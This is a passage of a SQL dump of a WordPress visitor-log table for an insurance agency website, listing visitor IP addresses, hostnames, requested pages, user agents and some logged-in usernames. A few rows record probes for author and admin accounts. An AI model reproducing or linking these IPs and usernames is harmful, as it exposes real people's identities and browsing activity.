41','us','','','','','','','0','0',0),(15938,'0b_68c61de63c44ef82fff3a5600edd50a1','1460393457','89.144.54.157','nine76.blahdirect.com','/comments/feed/','Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/23.0','','',0,'Win8','Firefox 23','us','','','','','','','0','0',0),(15941,'0b_57d61e0733f97ca8b810168268ad4c32','1460393457','95.143.47.2','medinged.net','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; yie8)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(15944,'0b_e8e81f92339e008e9b0acb210c4773a4','1460393457','149.5.113.131','149.5.113.131','/carriers/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36','','',0,'WinXP','Chrome 36','us','','','','','','','0','0',0),(15945,'0b_87d62fa8e9ea6992985bba18bbabd002','1460393458','217.79.251.47','217.79.251.47','/agent-tools/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Linux','Firefox 21','us','','','','','','','0','0',0),(15947,'0b_17c04e96d41e5781672eac360b646edc','1460395780','66.160.179.183','66.160.179.183','/robots.txt','Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0','','',0,'Win7','Firefox 21','us','','','Unknown Spider','','','','0','0',0),(15950,'0b_dec465c51fcc29e64b24306af24cc8c6','1460395790','71.35.168.248','71-35-168-248.tukw.qwest.net','/robots.txt','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)','','',0,'Win7','IE 9','us','','','Unknown Spider','','','','0','0',0),(15951,'0b_6d5b55a9d2b32458a4898b4e36bf2f6c','1460395792','95.143.46.227','scoperan.net','/case-status/feed/','Opera/9.80 (Windows NT 6.0; U; en) Presto/2.8.99 Version/11.10','','',0,'WinVista','Opera 9','us','','','','','','','0','0',0),(15953,'0b_8280aef8808298dae978984c7246bbe4','1460395792','149.5.113.141','149.5.113.141','/?p=9','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET CLR 1.1.4322; .NET4.0C; Tablet PC 2.0)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(15956,'0b_fe92a909457b37ea71ad2aa4dd8d4292','1460395803','95.143.46.238','scoperan.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36','','',0,'MacOSX','Chrome 32','us','','','','','','','0','0',0),(15959,'0b_e26b9e332d6be79e4710325900653bb0','1460395780','107.155.197.66','107.155.197.66','/robots.txt','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; yie8)','','',0,'Win7','IE 9','us','','','Unknown Spider','','','','0','0',0),(15962,'0b_96ad6140f5266a9c7258fbfd40ff9ae5','1460395807','206.217.195.69','usa1.datatr.com','/?p=181','Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','','',0,'OpenBSD','Chrome 36','us','','','','','','','0','0',0),(15963,'0b_4b13ef6a520e3a1602074ae9cc4c2510','1460395807','217.18.245.145','217.18.245.145','/?p=8','Mozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Linux','Firefox 21','us','','','','','','','0','0',0),(15965,'0b_0b8f43e6b23eba15e9579573a341133b','1460395817','91.223.159.120','91.223.159.120','/agent-tools/','Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0','','',0,'WinXP','Firefox 21','us','','','','','','','0','0',0),(15968,'0b_378d03e65a9ee1f89652b5f9b759dcc1','1460395806','207.195.235.228','207.195.235.228','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(15969,'0b_16223583dd3ccb1a41f2a98aa3ae2dda','1460395829','95.143.46.175','scoperan.net','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0','','',0,'MacOSX','Firefox 24','us','','','','','','','0','0',0),(15971,'0b_12cb518c5023ba08a2ae96cecc8cc987','1460395827','80.79.123.9','80.79.123.9','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(15974,'0b_f2729d4af4d4214753c4b59ae4d17247','1460395830','37.247.126.39','37.247.126.39','/?p=306','Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Win7','Firefox 21','us','','','','','','','0','0',0),(15975,'0b_3e958ef96a563ffd894e107a126e64be','1460395838','185.75.242.181','185.75.242.181','/?p=283','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Win7 x64','Firefox 21','us','','','','','','','0','0',0),(15978,'0b_a05fa64271cf07f8f195bef69bb99219','1460395848','71.35.171.117','71-35-171-117.tukw.qwest.net','/?p=277','Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0','','',0,'Win7','Firefox 21','us','','','','','','','0','0',0),(15980,'0b_7602f5158a98adb4c43ad06d89947557','1460395848','207.195.228.173','207-195-228-173.static.webcoretech.com','/licensing-contracting/','Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00','','',0,'Win2003','Opera 12','us','','','','','','','0','0',0),(15983,'0b_f04c3b227fcb164ef6a59e97cf8ae11b','1460395850','71.7.181.145','blk-7-181-145.eastlink.ca','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36','','',0,'Win7','Chrome 36','ca','','','','','','','0','0',0),(15984,'0b_0c2c27e9832598a5e0aa72efa7ec38bf','1460395841','195.200.217.201','195.200.217.201','/?p=169','Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)','','',0,'Windows','IE 9','us','','','','','','','0','0',0),(15987,'0b_a2f120e8d26eb2bb60a00f8e207a3538','1460395851','91.223.159.157','91.223.159.157','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','','',0,'Win8','Chrome 41','us','','','','','','','0','0',0),(15989,'0b_81ce88120887dfe0f6424a0256a7f735','1460395854','85.93.9.13','85.93.9.13','/register/','Opera/9.80 (Windows NT 6.1; U; en-US) Presto/2.9.181 Version/12.00','','',0,'Win7','Opera 9','us','','','','','','','0','0',0),(15992,'0b_e17aaddaf42ad21c1c6aa14a14be1a4d','1460395861','212.69.191.229','212.69.191.229','/?p=185','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130401 Firefox/21.0','','',0,'Win7 x64','Firefox 21','us','','','','','','','0','0',0),(15993,'0b_5dfb0d4967c697a212727d268e88bcda','1460395865','37.247.124.105','37.247.124.105','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(15996,'0b_9ec6cf592f2622cd1de4034fd3cd6aba','1460395875','65.49.1.117','65.49.1.117','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36','','',0,'Win7','Chrome 31','us','','','','','','','0','0',0),(15998,'0b_ab5a507852076a94a8debe1930f50314','1460395887','108.82.81.209','adsl-108-82-81-209.dsl.aus2tx.sbcglobal.net','/licensing-contracting/feed/','Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3','','',0,'Win7','Firefox 27','us','','','','','','','0','0',0),(15999,'0b_186c82e453b435eecf9fea73836e9ce7','1460395888','178.18.242.49','cybercommunications32.com','/?p=10','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0','','',0,'Linux','Firefox 21','us','','','','','','','0','0',0),(16002,'0b_174559fed4748baced3ee9ab7cde97c0','1460395870','207.195.235.54','207.195.235.54','/register/feed/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36','','',0,'MacOSX','Chrome 36','us','','','','','','','0','0',0),(16005,'0b_4eb9980d0ad31a546553c6e12b331aea','1460395892','217.172.39.186','reverse.lightup.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16008,'0b_98f1cf7390c12c991a916c17dd384c0f','1460395890','37.247.123.167','37.247.123.167','/about-us/feed/','Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/23.0','','',0,'Win8','Firefox 23','us','','','','','','','0','0',0),(16010,'0b_7753ead58a6185cb35e479a02b9186ba','1460395893','212.69.169.61','212.69.169.61','/?p=303','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(16011,'0b_46d3f7c00d50cf587006833d1d9e77bd','1460395903','94.103.43.180','94.103.43.180','/?page_id=169','Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36','','',0,'WinNT 4.0','Chrome 37','us','','','','','','','3','0',0),(16014,'0b_f36fa092ee809a940b9be1c44a2faad8','1460395900','23.239.166.148','23.239.166.148','/?p=311','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130401 Firefox/21.0','','',0,'Win7 x64','Firefox 21','us','','','','','','','0','0',0),(16016,'0b_7f5016cbc49f9f0a40f0fef0773531a4','1460395912','23.239.161.24','23.239.161.24','/case-status/','Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0','','',0,'Win7','Firefox 22','us','','','','','','','0','0',0),(16019,'0b_fc59f269312ca51b5a14b603c3df156a','1460395928','89.144.35.247','89.144.35.247','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/23.0','','',0,'Win8','Firefox 23','us','','','','','','','0','0',0),(16022,'0b_549a575b8e2baba28fd2d3b972e8699f','1460395939','217.172.53.210','rbi0180.giga-dns.com','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0','','',0,'Win7 x64','Firefox 31','us','','','','','','','0','0',0),(16023,'0b_07d77dda9239f86a3d1ba617dcf176ec','1460395942','89.144.26.9','host26.downpicks.com','/?p=290','Opera/12.0(Windows NT 5.1;U;en)Presto/22.9.168 Version/12.00','','',0,'WinXP','Opera 12','us','','','','','','','0','0',0),(16025,'0b_d30a9d6e9be75974541607afe744d592','1460395943','71.7.181.145','blk-7-181-145.eastlink.ca','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)','','',0,'Win7 x64','IE 9','ca','','','','','','','0','0',0),(16026,'0b_aaa92a3fbbdbc9cc9ad76afb6881065d','1460395938','23.226.222.182','23.226.222.182','/register/','Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)','','',0,'Nokia','Nokia','us','','','','','','','0','0',0),(16029,'0b_a781ef1792570d8c3a5ead7451c55bae','1460395943','149.5.113.184','149.5.113.184','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0','','',0,'Win7 x64','Firefox 21','us','','','','','','','0','0',0),(16032,'0b_d47dbfe3740e2f48ded25460bfe8a925','1460395949','37.247.125.79','37.247.125.79','/agent-tools/feed/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0','','',0,'Linux','Firefox 24','us','','','','','','','0','0',0),(16035,'0b_c0890092f98e97f1ebf22896d14e28c5','1460395953','212.69.191.243','212.69.191.243','/?p=309','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(16037,'0b_6d93952edaa0743010b610704429cb00','1460395959','94.103.43.173','94.103.43.173','/?p=319','Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0','','',0,'WinXP','Firefox 21','us','','','','','','','0','0',0),(16040,'0b_de5600d92074bc0321a62de4e78b2406','1460395969','207.195.228.72','207-195-228-72.static.webcoretech.com','/term-quotes/','Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02','','',0,'WinXP','Opera 12','us','','','','','','','0','0',0),(16041,'0b_919163af41e607553c24380a2052edc0','1460395972','71.7.181.145','blk-7-181-145.eastlink.ca','/igo/','Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0','','',0,'Win8 x64','Firefox 27','ca','','','','','','','0','0',0),(16044,'0b_d82c7c98f579fdba5aaaa7cfe1bd1eee','1460395963','149.13.23.156','149.13.23.156','/?p=288','Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0','','',0,'WinXP','Firefox 21','us','','','','','','','0','0',0),(16047,'0b_4cfdc7cd8795ef40d2876495e687ae2b','1460395973','149.13.21.206','149.13.21.206','/term-quotes/feed/','Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27','','',0,'WinVista','Version 5','us','','','','','','','0','0',0),(16050,'0b_05cc71a750f87626bfa8471c54da3d32','1460395973','185.75.243.139','185.75.243.139','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko','','',0,'Win8','','us','','','','','','','0','0',0),(16052,'0b_a39bf6be70c6a8f944d3e41ce42086d1','1460395982','217.18.244.165','217.18.244.165','/carriers/feed/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Linux','Firefox 21','us','','','','','','','0','0',0),(16055,'0b_e99f4ed64aa8d817d39aee3c7e6fdff0','1460395986','212.69.191.229','212.69.191.229','/contact/feed/','Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko','','',0,'Win8','','us','','','','','','','0','0',0),(16056,'0b_75de4b47099aa754d88fd9c39475d8fc','1460395992','149.5.113.188','149.5.113.188','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(16058,'0b_46571a8b2dcb15f7539c164f807750d4','1460396003','216.146.141.34','unic-216-146-141-034.gw18.dy.dhub.mgenerations.net','/meet-the-eib-team/','Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00','','',0,'Win2003','Opera 12','us','','','','','','','0','0',0),(16059,'0b_f86c683c74bda574496f9c4313fc807c','1460395995','217.79.251.136','217.79.251.136','/igo/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(16061,'0b_c44073e62568395c2e64672bee53a31e','1460396847','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(16062,'0b_dd3cc927f1ef639a5fdbaf2aeec8c9d4','1460397067','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16064,'0b_dd3cc927f1ef639a5fdbaf2aeec8c9d4','1460397068','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16065,'0b_dd3cc927f1ef639a5fdbaf2aeec8c9d4','1460397174','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16067,'0b_dd3cc927f1ef639a5fdbaf2aeec8c9d4','1460397176','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16070,'0b_65176683bc0e5d9b819a92e8ee2b9c51','1460397177','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16073,'0b_65176683bc0e5d9b819a92e8ee2b9c51','1460397178','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16076,'0b_65176683bc0e5d9b819a92e8ee2b9c51','1460397181','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16077,'0b_65176683bc0e5d9b819a92e8ee2b9c51','1460397194','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(16080,'0b_c4cc769cf04a0d9ab5ee7d1ad9cf20f1','1460399055','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(16083,'0b_40553a209303ae344f015c967500a0b2','1460399055','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16085,'0b_c4cc769cf04a0d9ab5ee7d1ad9cf20f1','1460399063','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(16086,'0b_c44073e62568395c2e64672bee53a31e','1460399064','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(16088,'0b_c44073e62568395c2e64672bee53a31e','1460399065','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(16091,'0b_c44073e62568395c2e64672bee53a31e','1460399072','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(16094,'0b_65176683bc0e5d9b819a92e8ee2b9c51','1460399159','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0); INSERT INTO `wp_wassup` VALUES (16095,'0b_65176683bc0e5d9b819a92e8ee2b9c51','1460399163','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(16098,'0b_317aa08d668afd740daab28746368cd1','1460400811','142.4.218.156','spider-5.lipperhey.com','/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16101,'0b_317aa08d668afd740daab28746368cd1','1460400815','142.4.218.156','spider-5.lipperhey.com','/robots.txt','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16104,'0b_317aa08d668afd740daab28746368cd1','1460400816','142.4.218.156','spider-5.lipperhey.com','/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16106,'0b_317aa08d668afd740daab28746368cd1','1460400817','142.4.218.156','spider-5.lipperhey.com','/contact/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16107,'0b_317aa08d668afd740daab28746368cd1','1460400819','142.4.218.156','spider-5.lipperhey.com','/about-us/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16109,'0b_317aa08d668afd740daab28746368cd1','1460400821','142.4.218.156','spider-5.lipperhey.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16110,'0b_317aa08d668afd740daab28746368cd1','1460400822','142.4.218.156','spider-5.lipperhey.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16113,'0b_317aa08d668afd740daab28746368cd1','1460400824','142.4.218.156','spider-5.lipperhey.com','/case-status/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16116,'0b_317aa08d668afd740daab28746368cd1','1460400826','142.4.218.156','spider-5.lipperhey.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16118,'0b_317aa08d668afd740daab28746368cd1','1460400827','142.4.218.156','spider-5.lipperhey.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16121,'0b_317aa08d668afd740daab28746368cd1','1460400828','142.4.218.156','spider-5.lipperhey.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16124,'0b_317aa08d668afd740daab28746368cd1','1460400830','142.4.218.156','spider-5.lipperhey.com','/forms/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16127,'0b_317aa08d668afd740daab28746368cd1','1460400833','142.4.218.156','spider-5.lipperhey.com','/insentives/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(16130,'0b_9e7e9795336f0d8a5ad5139194a89a0b','1460400835','142.4.218.156','spider-5.lipperhey.com','/','Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19','','',0,'Android 4','Chrome 18 Mobile','','','','Unknown Spider','','','','0','0',0),(16133,'0b_17e97cae6243b123780a3b56590606f9','1460401072','5.153.234.154','5.153.234.154','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(16134,'0b_17e97cae6243b123780a3b56590606f9','1460401082','5.153.234.154','5.153.234.154','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(16136,'0b_17e97cae6243b123780a3b56590606f9','1460401092','5.153.234.154','5.153.234.154','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(16137,'0b_02f8c25e0621164db262210e7b1a5880','1460402869','66.249.83.144,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(16140,'0b_aeee47a47568938a697c31ed0818bbd4','1460402986','108.33.234.35','static-108-33-234-35.tampfl.fios.frontiernet.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16142,'0b_aeee47a47568938a697c31ed0818bbd4','1460402992','108.33.234.35','static-108-33-234-35.tampfl.fios.frontiernet.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16145,'0b_c0f0f143abbc70b7ab33037fa4626ffa','1460403001','108.33.234.35','static-108-33-234-35.tampfl.fios.frontiernet.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(16148,'0b_c44073e62568395c2e64672bee53a31e','1460403002','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(16151,'0b_c44073e62568395c2e64672bee53a31e','1460403003','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 